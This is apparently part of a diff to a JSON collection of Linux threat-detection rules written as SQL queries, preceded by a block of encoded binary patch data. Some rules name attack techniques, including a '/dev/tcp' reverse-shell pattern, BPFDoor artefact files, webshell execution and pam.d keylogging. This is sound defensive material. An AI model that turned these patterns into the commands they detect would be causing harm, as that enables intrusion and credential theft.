z1{iF#0bZ#`;F)8eGa+AXp9u}ww_T6|tq|=LykKL`c7BciVAL|ZKz99Ig|xqRVWUKG z*75`U!;7)K5yx!l?m&w=RK%_Y&j1G!u>3Wn)fDu3!eKk$;{p?n%RVp zi+UWjl68XKWdmYkI*i5ugQC4ft5ne7*%mwm6PO>EL&(#IY~A{D`tb-d#O1vInvtaV zq+RACq$qp58(Nt)&n(@eYcgU#-+$unjk@ytRHdTic)CZqYxNkpV0kbC%q!+%v+K+! 
z>WK)bGTK7)0GPt5pZy319(p`#xU5gyyzgPE^#lxLo|_beVxY)_I|wg^km-a^NtA{E zUaN>9##i1duZ$wSGqBaQ@|V?bqqTzsWLEhDE(xe1N3mv5nzoRp_FDDvzAVsK{Ux1N zbCoJfh9)o9SxPvHNAnl~7Ek&8Jo@j!)$CZ0xZLJ(P7WMvGml6ogufeVErGe33ntMP zSQY^%!+_8e2dN~gFdVE6v%pfj1YD-H(N|=ZI)rW|U16m_)tk|qhFTOC!S+DC$T&b# za%92gKMit7=kA*=9gI4s&(+0_7Zl)bJ#bt!{>{&iwErC=R~rnVLUL2;2NQxva8qck zwUU-fS*Ymm9W3zmAd)RK>m7F2u1i2^mIOS>+(Sy5dWa_4UvmDITt zsPBfrpIx+J$y)>s$xSQx?GNnfZ)m+t@2LxV-{!9Wf$^_5=s|KecVrr&rm)Qu#mR3L zq7sjyzzdGf4$B96$25>v>=3Hy$xEA#G~HCvw~Bqy!dB0}w@{DYeMsC{FBr7^NDVmR zf%};xO=}4lmdAIz*R+O$L;adNa;%&0e~?Y=oK2_CYDdGaNJ0`~RXC*y%CC$%vlPt! zHKFh21JO*GbP;1xm`jc{SQe%-M^H-T+|>35ZmZ=UpAgF!|50oF$s@UT7fmk6pXlK6 zoEghGd8mB&-ZK~f#%XXASRU`0o``}d@aGMt#xV`x|J6aRZYvyL_Z-W)%$L;fVW`%- zlRZ0g#sPJY%kay1^=#}Ls`U^Zq=F+^*$@tyiFh{dLx?Q`F7IB+VkL684D5Rz#w587w<+>s`6W6w>+w~1w5Sl z(6P=u5YjX4fYt9^YwpHe2TMCRLKVJmYxjHGBWx5gmo>0@*?I`WB|6Zo&wUImw?dU( zopVp;v|-=7syu%yP5{Tn=PBOrJmbV^0a=%d22NlS3Mp^ah2)) zvyd&`BR$VY!Uz|%E#x~?^n+Ia|df+qKT#+F(#cK2I#*iRbp%%8O zuk$ZYuu4FqS&IrV?o|cb7 zjJ<&QKisN@AE%tqCzuIxfLO6l;-J-wK zgjJ1QgABHt&1ebNLVrg4g|`bCX8r&)PkK6qSQdNQ=mB3t);Z}S_k|=_mv1V29Ivhz z>_PmR2y6j+O18eW&N?n~CMGWOywbR#E2LM2Bz|hnFT}o5uzNVR>c3r==u>GBVyzPF z7+nSLV{VT>Wxq39xsZ65oRGQyaIJPxwZw#R`eZ4#>*rP+Hrpng3BCggvsldpPJxpjDo932$P|gN8XgNdZao7$cn8KUJ!k>-Hk^RPds$U{+>cI3N$E zsGGLpdm1&B^xMNK1gw7QXHEdfap2Saocy;?ztMX`ug=9rAYSXMo1U=!qAkC|G)C?& zK&mourI#qCD98RLRjVo|sjfT}QtN7&Q^=e~%Kt;v@#k1m9bjGyh1F6zvQnGk=tBcH zp|6>aC>Zi%YE4i2;K8CppUDWLu5IB%iJh2|-Yayu4{86F39kc@%Qsz0zkW{=gB{qK1zpRN-{rNYn##=M z_R5d0@}8KGUA8X0EpKngsyMd=3hEc)*uAgm>dBv-+zj zRCd((oz~RHOaqHy@O8o~`$|lbH65V(*ARfv%C{56qz!?mN}M9hHTSWW*2tO2Qps-p zE2($S$vOYxehvs#m2N@wbzARf0CQg!D?JOAovNtgM&jh);&U-JFK`gfy|FdCWQ^)l z>QZ+`(gPTRGdQ|2KPQz{5N^jZ!<#bwb4Ty6p7ZbvZf`)JSr+4(KQcu<{p#LYYgvGv z_tS&k=S)%Cok)Hy%9J!^2Z9Idm1Cs!4=WwQlymV=Av1nYN8=b90Rmb|ue;_Q`u+D7 zGM*gdW4ZdGOH+jx96@gKdx?56M)}$kPh!DMW)C2-i1(wSG;Ceh?gJaa|9L*0Oxun2 zbR;x(c1pn>!On&wRU%VM_@AKwCHwYeI(CYc+4@+PZ+IHbJAARJ73+gGfy2pGFxU|E 
zD&nC2i#*BATX$3xNayks8{4NUNhIy4^!7|jYC+c!pIUgVX|We~$gT-ams4EHLYzWlZfEH$?aHaJ^32D)U+(8{XhcP6MsRcMULD7)2^DE0wxOO|!UGn0x zq$(#%pNm^0G=hxXEn;1(DUNy4Sf&mNBeC`+S zBXC3X^-w80+4OxgmoT3Qn?}T82A^Sxal!!el(^JH?U|(`wB)0k9SZN?IxQo)h!lSW z_tmlLGouC?{@N&UYn8=%Q`i|GhISzext6FavE1ZJBG=hw>C zELpRIAH=sJP3(Sm3V{ad(%#*Sagbf>V;*Pxl!{E!N@3ox?bH~i!-g4R8D3|ZR)_?U z^P9iDLU40=AjSBZ&#=ChD&3-`zMl|9g_g3I`&-#7^g%RR+?{dGyN~(?Td@I7 ziRAK}2>1e4ku-G8nHsUebm&wGr28d=6>PI+BxFGmZ?o4Uoy~AnTCTnIN+e2$2Cf5* z2GwojHZQT;?O4|OS^hT99QWNL|J(&UlWYaj&a1e#6J0n;{EZA>8maB$FS(S$oZE?N zzmQOLCLnv0>1%m)BTUN5h%c;pzHd!oWkF{)q<`FE?woROyj>x z)TsbmtqoU82&$}PWBlTvomFirq-RP_K4y`5ru+HN%&hC2&lYsH-aT+ni2f2FsbEmp z2f;WXdc&n<+bOs<=smZMn~UV6Ffw#_NG#^f^@T(>i^x0b+qG{fnw0|~bQ1$1P)Epx z68hX6OH3y_TIRbM?*s)>ZcivlFP=W^V5zX9X05e*G+$?VcpF=r_WJ`6-pz6r~w-u?dMBU776 zbn?-zR^w$VYD3{c`zbj93zT{Js|>P{@avc+%|*y(sT(E46U`uY?<@|ZP7uo9kSz7Y zpOnVxvVUyd#x!T-rL|KUGao!^x^gBcF_W zWHLS@XE;d_f;M^bmI5}BBwfBG5xh+&TZP`!$xVIT$k>hp`gnQ(!9f_*H896PVFkOd zdIVY^03XnzH)qi69&44?Gg(eII(K&W>DK{jaG_-BmLJZWbn`NoOr3?g_3-EO_G9TP z!!xIR;E!c% zXcVxs)4<5gmt4ikX;a5S3pLg{|1D`da1Rg*+3?D4)fG0U{CY7u=xBOlK^}QdkSLgU zDyPmU0ymRUaP?wIm5rbes2sDv2z!BOS(A^V-s_Bwvu&lKDAwM1g+&yZW?=k6T@91yb_@8u~;V zh=z@*?JH>}W-tg5U^j2hlF9T4>-G*&udxpKHYVv19T(2IJ~EmE>a2g?x@<_E|=Ead+g{wCi1e>yA&EA#*DB#HKh(M4T;{1O`l zPcC37u^!&aul8$VaQiE3H$(#qVS`>=5LhtU9U|0^KwQar{?=VXv!{>VvWHS(SEz2_ zx5yB&*j%&L-Q2@^aquDdmH9&iaN+X>fM%V{PUk(!Iq>N|f=3ztmk=*S2F%ja1&9QS z>SuHM6t*ae?JyKuIc9Td`GV+>A~P2dAzw)RVbuPkO82mYQopg*Z)vxBBoWmU@?M?V z-OGfsiPesOv&L1o;tl&@GaR-wF9+sQRm!SCiUq?OfjuB+NWr?zDrQWK{cqX+4$Sq4gT{P+%(bS_6~pk z*~hk6ry3YOXMI(z^#LD<$Mf_8;6JX_=-nsL%xPGo)2Am5%~=>(8`6HItxn>ZGu+Xz z=4$oQnPMHvqD<`a1hM$0|+F)72++Cas49v?eM|@USTl?S|8xjFwoh zm~hiP(xWFShLcw(ZH+e4p3{)$7;EIHCTB^_4%R-5%zAZm zG!qOm45~)^sydLd-%{BAN`EQ;EkL?@dK&p$Gwd?az#^Fp``6zJUkO~iQLf9_OH#@H zk?=Ekl}LVesI&~-it8CVur61IwVwq)2wnTT2~u#&UR@_bR%);&Q}!VQOc z&0eg20Ll&~hSNJ>_!f<99K9a3@n%d$mx|k>r=t;Fy_C(hT-e(7Nl+(5mJkg$ARG|g zDq?vV31?=Kq&6krD)(D1MK$1F<_dpTor~rP*3lPR9t;s{#5vbb{b-MIAz{Gzi60k( 
zq+ghfCREqYJuPz$v z-NP8G4jhdEYb`;(;PKY&h=m#x>;Y47^z>iCDP^biCCrlGG)ra7{<>Z&R)>p^ZuQ9Q zB&wp~M~r6#=+M&3$X7@0EY{5_k8w+{QiJ-wTmhQ?6>S6_^K_SV)<>*K_-%qtKaT=@ zR5b#5ef{bjKwqCS>%q_0=K^?T;-*l*vY7qI^O$44WbU03TWB7%#V9O*K^L%^WHxew zr)!}x>?v2voZ5Y2TBHIAdcP6W`A1K8?yPTd)&`swa7e-pkmyZIcB+UYewhhyEm1-a zy#j2f)NZIxldkhZCrR?DQOQoUGOI>ew2&UTFr(B)1ZJ}j%R5@&012QBW9$77(p0*N z5~gOZI(^PsaQ@p>=Di&<)8f(^JV2qkdHUN;>7DW4?srLEmehvAK4(B;vh^2 zS@^-ya}?-xy}mj!It~H_5Ob}R`I7Jl4**cKN-ur$uaI{r;F)4Unuc+B%>8E896vi5 zwh3cUn`rQ|0zON0FfNB?bna<8;Q<|AHdo1r?sT-M1q}_xYtIO}I;6je{`N)-E0;^R zt0l#UvhF2o(0}q;Zvn%zG*KX&NF2a62ks0X+^$3$GJVbCHrPZwYeHHv$!=2&vj8ZG zN%>3p&uCNbKK?g4%RStipe#E!h$dA#e`{iFc5tm}bsQ9i2uu%nO>aSsKQ3HrA$EHa zlNXMR@VNT9U~I#jFdQWtlRO~VAv|fpz@C~zE_fGKwqi!jCIq9?FIhKP2S9V!#((-C z_*`m0KzO#$JRKdJHQXv!PCTXsvjP4V-Iu8~ku>wQJ8vsu8iIFC5e;LLJw+*rC!<4P z?$zd)6`Sf~@qBoUWMecbLLQ_i7n$Jkd#YjFB0W--E4E zmR#3`P^1A3U4L@}?OHwS;z+cyVnhjy3EoPdiSJf505uWWeDRasA&#J_@_=Ch->;QgF!lJOq5GlBIf<2D8R=dyR+cmwOLG+k3m)MSBW&5tt z2wj+UTDbi+x?YE8SRm8&O^dClD=h$`nZ&sU^8{wlWocXgED+~3&r>5(?VqaqMHyXM z?k_=S?`;GJjUtIAqA4KmShk8-deKUXoEx+Suo`0yyn4+w;<=nX+WW60J|p0xvBCC7tJv@D z)r5~$QKA}6_h%ru7{K2G_5Gwx0rgqHXoBa28~0tUQbShAYZ&yt$` z?+%la$KoHTj3uK`c5L>eG;eQv?_t~*c+H*h6hKEj($)Y$Ie_`szxTwG@^hnRPX3ya zA3&-!Zrm@gZ4p;A#?czO5$1{Ql{zH5bZS}aKGa)PhD7;S@8=%WubnAc z;a|2oi~y@B-00eAEO+Xu=Sy;XI?}^%)PskN$EonkbbnqX&Isz5o2sq88T~Hjn`xOZ z=jdMPv_UL8vAF&gIjywcT$`Fch@BkDb;qd>Oa#MU|L)ND&M$Zhr#qLUZh;<)UE?)I zi9jcfdZf(22^4U98DnEDb9{|`)8qrR{HSx$3IN0B+?1jZg#G6@hnBy#Pj%Tf<{0kDaLJdPL6%1M>bDvt4$lGViuRj?#d%QG?vJI4z0&@R@?1!ctyY8 zo3)a-332z>Qy>~6imjMID;=XegTlDvzRh(>Bb{E&fe9N7%}@N|#&hUJ?2lxM)4fD? 
zSb(~lh`3R6cP)G${|Y_*BrScJ24A5;!kff(ams}4nFmTS)-u;*ZdiIu^)qnQ zV*1|-W+~nwPhnWKipuGMEJ?B`>(4B9mtI9kuQXcpf;iaxA`wp!x;LQDh=IY;Zs{D6 z<`5rNlN zKFvKyKF@ZdWgystb0qphOWx(*l^^0zUk43yP@e7-g8e4`_3SfU9 z2$rl$y@d_UKax*<^)O|G$tb@_<}e`NM@7j=*&;HRSFT(^Vholgxc1rjbQ$6h*IFxY zuF%OLW|BvX$S&>Mj!7Y)XR`k;F00sfJnI0GF_>#a!ne(t89lsZ)IG|}hV=J&C%Cdw zQ#d!e;TD~~Vq8jH%#~@c(c$xVETI2B$j}en3HY%0blWrN7co#+-k;jnEWep)xc)q5 zeEGWqRO^;=1=K`{;sUGWgIjcZX)IxAAD#OBA7jycT%p^;P#dC4hmlqP2gBP7J(m38 zBc|OUM6|a#Tf+^xgcS24B!$0nkc}0JvZRWCJjt-z#CQhOfhM0^Om}OSC_u7+eO(bZ z^d(_NC@%g8iuzxk#FYIvm4@V{7U%#_%@R=m~5^LM`!MGwY6TSG~M z$n?k$!i)T<>fX<&(h8yBv9-uY6l+ctyY%A4{@bn;lRN1aUTj|O2S6%Png78nI7;iU z2+f0pt8y>{1wJGm47ah_49_032lg72k3ong6+21k`~#lgz5^v&^mh|W_1~xC^1=tR zIfXxiV{AcxoZb-spTgcMEb6HH-&Rn%OOOWX9=b)kqy`vTN1=wZBC;;$Z+lj6NE7-A ztayx?Bxwaif0&43K~zU?4|Zlu`&dGE^c;?qp}<|Tj)lPKSBAN;S3H#(SMtLt9f`>! zK+Mk!M{3UHM|sYrbCdSOFONVw)9|gbcXpzFHyXCP&hm;MKJrQ$g=TojDX|%kIl57 zHRkzfJZdb7m_?ksqRejFf2{MnI+%n`mB} zvx4-;b=Uz*m}tQ0WUqVJTFVTw;o}zozfuYO?m)8q{C+G*l0_nd6IusdShsh#HW~~` zIP}=`>Ur<#HHH?$Xu;#k-8=00VIMLm%oXn#e1Akt`jWo&p2{v>y45FkP|4dHfX>IY zHM$-47U^bgrAA4UBhRX*r6?VnNcyXscPmZHbn&sEqnGq~R~zIqcCj+@g6L&(%9S`O zCDPn?UhNqOs0sYoa}GtCntQRkW${z02pqw-8FxrcKt@;k3^oezK^qThC+n^L3pk&!0DRA19NuDS6lQ z=01yDIO9;A4fSBxmO^lF&{bH2VKS?2;bmgG=II34>k@g(2oFB+?#~wT0D2oelxM+rMVR5245arsqi^NWw z-~{he^x8$E;BK(shA#0ojrG%4 z7+(=Ho1lqf#j)-!3;_k|zb!U*EVVj!rSfJ%?P}<SvU7)*|colp-&><9>GZ< zf1oL}n!Wde2s}sN?EhS~nkPL;dh$;S{=4~n)L`YAW$;o$q}p^|ogj2hu8MoDvcc0V zT1ekG(ZR0Y+g@I{ITsmpRO44FXvW;X%pg7(iVsY{O}nQ%CtH7B9c~`43KLaSf(6f9 z`H6>-m+ZZd(h^U9;J?bd=I2z$3bs5ellV=b6h9L``arBbSju?BdU_;OAT;lKhZ4=2 zMVS&t2anRSMNvA4*dh=W;}>BjbM^SjdAbtOGcfa}Qgru5w&4X_oke#k;Vi@}r}OJ} z=nNpe;GE{3XEbc{8&p=#%FA1Zef}_y{6>pHr(vkn?OYbJ&vnk zt6Ns#iJN9TSkYBt_sM=y&hHTZqKw0qc2x^p%j&5^1R|%cWb3b$Ef3zXa(sja*ouo+ zhcXRnEBkIe5j-+~+);WG^NTV&Hh%V;7X*lxHF8TQf2~#d2^$MUX+Uz0*`*|mwt4kE zQreEACIVG8@;&-#giTwlKYl<4NBeZ>O(+e_oN{$KR-W%625W4H{0?OyZy7q6OhJe*0wc6=BwngpEO6b z3Vt^PBbBX0uxx<_)W7nL`?~RsDdj` 
zs*oPOHkFYU)WkR~Y$a-$BL9{c@G{IMUCE^;ryk2XRqmcN<>32ysrK>ejZXhh{*FIg z`K?0rrnBafF!nR8X_&E%y`e1)< z%TTq@soq}@igIoatW1l>Tqdg-M6+MwdCQ_bQ5FWFlk@qx?azNa@aJ1jhFro{uZ!8C zm~or(%fN9`yN&Ul_Pn#g06;F6@fAMDU<|_N>VE!r9K!?rq4v_r>1iAmYk*DNJAjiFyH0yWr7-YZvOV=)Wr)h~{-WayChZYq7`vS7 zsa2ntoLfR^lk^w(1MN{HY|NyrMSi;?pkmeddt^X7WmcEvlC!iO=HtwN#Ga3AmUNL_ z(pOs&O(akD4!i1-%B~h~qQ?fAhQ|r*hXI6+wm#z3H)Vs++7>w+%kKgt78})*mH8+$ zXH%CR08fwljm}?z_u+|cL_yefJyq(MnDeHz*ARA4PP`4ESBX2QRL*oO;)(df!5hrU zzPab-FfvqAI#XJetfsjh{*KnDKGROkwR*t9nYYaK&G&R`Cd%m$@5TJw_G}VE=AAjU zd)xd4tJX&BhG4Gp4u07WZcnenM}*A^tenL-zcc%WCV|?}x6c`{8|Za!z~%8Ig6a9H z_o5m63ap=i`TDBi4@1O7gY%t^ME{0-){N48DqT#Y105%wwEjZ=o-7q1+e=fhS2b6b z%qngCKtp;qAAiyq_8+C@JCoS5Dml`Ywq%KQjNPPCC%Adsi98$=Tl>R0vag;SWfJ=g zEHQdWu`ZIcB-hFPv+m?3nr^o4-_HWcWFvOz9ULOqm`OQ&bG5HRD3FM3p z96$sfZ^{9S)Gnu7HW))xKetG+!PC6oIJ zFn_bI;@ibL?W&F-h65j?1%V#|Q`idfa#!h-U^i-0QzFlZXojf#X1$8jIicu->la!Rn_oyLlzSDV zQF?N>2hze^;VQ7A@(vjx*OLNUHcoFxZs# z$jim<-nQ5}w`3BOHbv(I2N9i5n_o_qx_1MOd_iWsFo$oZC4mNWq}sBmaba@uA%`MW z&HKCe+|@$z{*7yORy=c+@oaKhQjBsGNs@29TyIEh;yc87l=Q)|=aEFHbX6$v_W%&j z9c8&;Z1RJTg{0^m%fp@nKL`OK+qu+`|L#Jz%A6^&QT#AIda;!M5oIP@S>GUUq=F*l z$?^F@G_=q@ke#eit|>o$Z|Gv@X}5>R&WNglMHlPGd#h-Nlt0vVtp3w#VdxgGsxxf- z0K^j$C?NSUSxxHY$G#lMM`I_tJRP9iAyDIlV2E3y(e?apxlbi+6(=GcSMh{4Txik- z%??K|+*O@6%*KMqwcf@;giLnG+lvpQu#3-2a*_UcyMLC9w~w^x5x=)Hh5EkUjlP@g=CTpxEOV^TApO^tbMQ_pph=&({N<3eOL`g5vrb~hjcT|>%= z26v~%=9;U>>&^v&45gUHF-~bjdo>?oVFdr60)a}aQRb1k>MEw5PQ*a=uRI+H*71OJ z7xLm5)pyFz&2N#qUXf2omd6l#?vrtGW7P~@;98r^GLl5u6L&?fWtfq~z+JGbsUl$V z0rsFW@fA9@|Ei&jgSDBoQ;#S3ymNj zcOpIqIl#-u{eQOG2z>)*LU|IuWs@;`%yg&8>p>FPq>lYy)%JI!XsJU%W-*l7WD#%~ zjHgGxqGoy9n4*|&%Mz8QDX8<~UB(12i2(PX{Eqce=0c9Q!@+0PW9~>W^S`ft{UlRc z4-gKUb|PV~4Me9xeMdO1SkA2iSYs(;YU+#<$x)nEB}dQ{2Zed>ebN^R!SN{eH;R=B zA;8EZgK?u z)yEtk&n9gDZQlL9vKX|Z!1als7+LmLk3@K3Chgk*8!p-`RB~K#np7MLAi#5IF_f7u!WLZQ(lnWbqGt6B+Qe*MA$hnC-liC8gj zbRr`oAeJFr^n)f*s@Ka;FF9!Qga5pwv{V4EsJ5%9Q&5gX(8zP`groP-R8f}GkhP36 zzkitNx3~AR@{dor^G0j-0DKpp);ogw73=jYQzn0si2Eo=Z=YYfUIQ!e=9b|5l@CQi 
z^`A^Bsm>joqWQTPCD})yiHY82M`q$CoKKgCmgkezjoXVtgK~Q2i0zuAE|H%_8h_KQ zZAa@<{ldaLQu#QAx4fRTTWy1n&(n{NJu)z9Rb-`7Nk!sQ=KKZX=JdYNrc5Z}5!lk( zkq|VfeF5vg+2%Ta!N6@HNg6dE{|>=v5Cti2RvuqMunot`eO~#mGxniCV(s4jXHO1ge9}ZCigY zSkZ7mt0B(S!inI@m*=B`8e4I8pN<#@vI=T!lPG=5by6|B0@8*SKpW`BVOV_Ik|X3YN&# zR)4B{n!h9kAT)J(IrWX)X76*9j%em``E)w(MnRvdCQxaaO@?dGCgTVT# z8O;g`y|(fVFiubxJu|(~!H&!mSb>_-iaqd@ef2?4`{MG-{~FbUe7me)E(R^bsNS6Q zo;aTi-e;w-x1W&Q*rVeVH8#JpeWSohuB5-!^=?%U`XCT^syuggfpv`-aBp)jz^d7Yx* zrFggY8R*}$5=^atsw`@}Nz2W?>Jc77Z>h9&+*Ix(E$pI`V@>^;$-6Xx*^|~<0M?hZ zxjYAqc=;(!y$)!?44TPPLQQKbdBa?-A2Rog8m#gKcH+7UW3`)I?EtMgun2TlAt`jq zeNJKr7A3w0)oXgm6!#nj3ebiT#&ZB^t$AnZOa$qjT z@cgO`9szIAv~;Y^3t!sPkZJYHV!uj-GZR8)y8B`={cL4yU2Iis?Q9Kg&q7JqqE&*{;aj}eSfiLT!mZOPJ+sT)D{noa|9Y9B= zXw>!T)Ckqv(3Lz-C^5;n{M37Dr>`QDf{R4iOK|nhtaR*i^tV}P1@-8mau#D_2*ZBO zhGMeq^2-{-4?vn8l1)c>xz62U*?~xwK3RE z9?x|!03CRS`LtHPO#@TG!C$Juzynreux}%l$`R&+eSbk!8*1Z^$G<`4DaNm>h^$iP z)5bRAc~lszqZKwb-_wbzSE==@CS)=+gCw`uE3Y=z!v5?n7xPPa_A@acs8 zql8J}EdDjG+>*PadvVZvXotfr?!JE~Nx-4q#p`v!Ye9*(@P`ouMg@?h16rIOvFQuZ za0l-iQjx{D9DTG}E-6~v->!X){$&ey&DLnCZks|=)G(@72$jPP8^LrnY7R-h;J26^ zhTl_n*3-W=882PPey$+Ci^@IinXgiBQ6n?N)7p}K=~0t`XxsUA8iEN$M^2*Ez!y^P-IXD(K|8}cl>KV z2vULUfctmhzo~5UiW7vK=jt?!Z<<0kllrl%&ZVG-lc2? 
z9Woi3{SIN(%IGVWr}I}k94J`#0l8UjFOnsxEHXz%5b{U=o-csjuUvibal(hFAZ7ZQXVe;R|mt>@_>JZPj1)X>k`bc$xzivoaQkn$mCA_LdUK_7Jys>%LW< z*GEm>%A3?hP;45%aTw>ftz-4b9!ah251SkOiz|$k>se9 zcY!}!{K1tw_BiUtE%(*wCXY!Zl+V7GUJ?e+A<+gWQh9t*?o=_U zOg^AZ$k@=xJzDK!Wsxr1-OxKM)XTUT%6DE8M(nza$V<=XKHJM(<+Q{$#DwD)yAMs$ zI%#jj`rNg~$W;SNrn?thxr%PrvG zq9}`IaAMQ!_A9b7X|`-QVl?o}C<%w=Ky~|vFLePS=LGBxITS2E{viRDKVgW*61&SA zqHCv2mg~M?KqN1}knKbE*Q5oQ!9Nh##GXQ6KcCaBn^P{mw5*wB&Wa7F*=x-qKZVoM z_mK`{ETkOY15LE^t!Z8}&6V8D6s!WV#dJsEtga1Uc1W)5ac&Qlf3o9VSfK3w{3ngD zpv@boZjn`G6e(2YmSc1+)cQ8}Y4GN| z&^guQwM0)}1nE*~Zt3(=8;C$c(S@Q4*@(A&p3Y&o}`2{`;3k#Z?g3N?@13n7rIvx&}Nnyfh%A|BiWreE-M8$v>$FR@I>ReTtARS}cEOSv(FwuUNqdvQ*j9vj_)`NQ2&;vrDJ;i&=1REs3A@>MvC#-~VuK_4d9kU%oqj7T;fR ze%j^=#)HAW20KJ`2%&X3zQXyfLSa)D{GIi(8P6i(tI%+#23V|$1E`Z$`!$M5?3IUm zmrH$T{sP6!8>{ovfj{jmzI0=l9ffoOVW?>X5ncO&rv2KDr_VuR2;a-$B!UT6-OsSo(pI{J<_& zSiMTC1Y5r(i^euyk^*6;nks6%;>f!Z@wr2mtmrA>LHXKRrh8tj7p@81WMQ8$aJq6* zlmL7Zg|doSL#7xdF;AgF<$c>w;i*Icb$!*^D;GVkpQ5cL?u;C}&-dds^_WF#d=LJZ z4k)c%SPL;V4kC3c=01TnJcP^ZUs@uEg{YNJX!nGH(9N3{BfzSDMqq)^+nN&&iB8vs zmy&B@VliH!^{Y4w5mqN+#_dr;BwVY+EwO^9#L1_>F13bxp&nRo*60kQl^s|(r5_76 zR-6n2*c^$c*SyNxPaE(BS3j3`!yqA3DN*yMLPtHm4b-?RQW^eXC)`vWd5|Ec6Ht>n zkUn#QBCx{I0>rqVaBi8>3#=-Ng}6fEtazwrRt(vDy>F1NSA5yqIfTfp)@*$uolmeO zet%%^R2-jY-F|GE8~NszJ%1pFC=(w=oi`J`kikT#=LovVm|RE$Sncoa;-pBUDY;(} z@*s7oADbeKE+wL65VGdgf>*MLM*{WZCZQ5T*q@3%;C>YX*%aE1TmNDE+vc3oDqkp> zLO_kts8p|qkx8)@KDmJ5EfrCXglu zF0CA9RQtYXP~6{@e>e5X=_k02BT=j1&cMbgC$lXj<8#}b!@Y?|m<;+UF0KDY&i`H; mou%p5{~Z7GC*tg4>g3|#Wce9GK!96NKp2C8K~_x; 3" + "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/var/run/haldrund.pid', '/var/run/xinetd.lock', '/var/run/kdevrund.pid'))" ], - "filename": "lnx_auth_susp_failed_logons_single_source.yml" + "filename": "lnx_auditd_bpfdoor_file_accessed.yml" }, { - "title": "PwnKit Local Privilege Escalation", - "id": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "author": "Sreeman", + 
"title": "Password Policy Discovery", + "id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "description": "Detects password policy discovery commands", + "author": "Ömer Günal, oscd.community, Pawel Mazur", "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ( = 'pkexec' AND = 'The value for environment variable XAUTHORITY contains suscipious content' AND = '[USER=root] [TTY=/dev/pts/0]')" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/common-password', '/etc/security/pwquality.conf', '/etc/pam.d/system-auth', '/etc/login.defs')) OR (type = 'EXECVE' AND a0 = 'chage' AND a1 IN ('--list', '-l')) OR (type = 'EXECVE' AND a0 = 'passwd' AND a1 IN ('-S', '--status')))" ], - "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml" + "filename": "lnx_auditd_password_policy_discovery.yml" }, { - "title": "Guacamole Two Users Sharing Session Anomaly", - "id": "1edd77db-0669-4fef-9598-165bda82826d", - "description": "Detects suspicious session with two users present", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Remote Command Execution", + "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "description": "Detects possible command execution by web application/web shell", + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Crazy web applications" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"(2 users now present)\"')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND syscall = 'execve' AND key LIKE 'detect\\_execve\\_www' ESCAPE '\\')" ], - "filename": "lnx_guacamole_susp_guacamole.yml" + "filename": 
"lnx_auditd_web_rce.yml" }, { - "title": "Suspicious Log Entries", - "id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "description": "Detects suspicious log entries in Linux log files", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of Hidden Paths Or Files", + "id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", + "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", + "author": "David Burkett, @signalblur", "tags": [ - "attack.impact" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"entered promiscuous mode\" OR \"Deactivating service\" OR \"Oversized packet received from\" OR \"imuxsock begins to drop messages\"'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name LIKE '%/.%' ESCAPE '\\') AND NOT ((name LIKE '%/.cache/%' ESCAPE '\\' OR name LIKE '%/.config/%' ESCAPE '\\' OR name LIKE '%/.pyenv/%' ESCAPE '\\' OR name LIKE '%/.rustup/toolchains%' ESCAPE '\\')))" ], - "filename": "lnx_shell_susp_log_entries.yml" + "filename": "lnx_auditd_hidden_binary_execution.yml" }, { - "title": "JexBoss Command Sequence", - "id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "description": "Detects suspicious command sequence that JexBoss", - "author": "Florian Roth (Nextron Systems)", + "title": "Data Compressed", + "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.exfiltration", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of archiving tools by legitimate user." 
+ ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'zip') OR (type = 'execve' AND a0 = 'gzip' AND a1 = '-f') OR (type = 'execve' AND a0 = 'tar' AND a1 LIKE '%-c%' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_data_compressed.yml" + }, + { + "title": "Linux Keylogging with Pam.d", + "id": "49aae26c-450e-448b-911d-b3c13d178dfc", + "description": "Detect attempt to enable auditing of TTY input", + "author": "Pawel Mazur", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ], + "falsepositives": [ + "Administrative work" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"bash -c /bin/bash\" AND \"&/dev/tcp/\"'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/system-auth', '/etc/pam.d/password-auth')) OR (type LIKE 'TTY' ESCAPE '\\' OR type LIKE 'USER\\_TTY' ESCAPE '\\'))" ], - "filename": "lnx_susp_jexboss.yml" + "filename": "lnx_auditd_keylogging_with_pam_d.yml" }, { - "title": "Modifying Crontab", - "id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "description": "Detects suspicious modification of crontab file.", + "title": "System Information Discovery - Auditd", + "id": 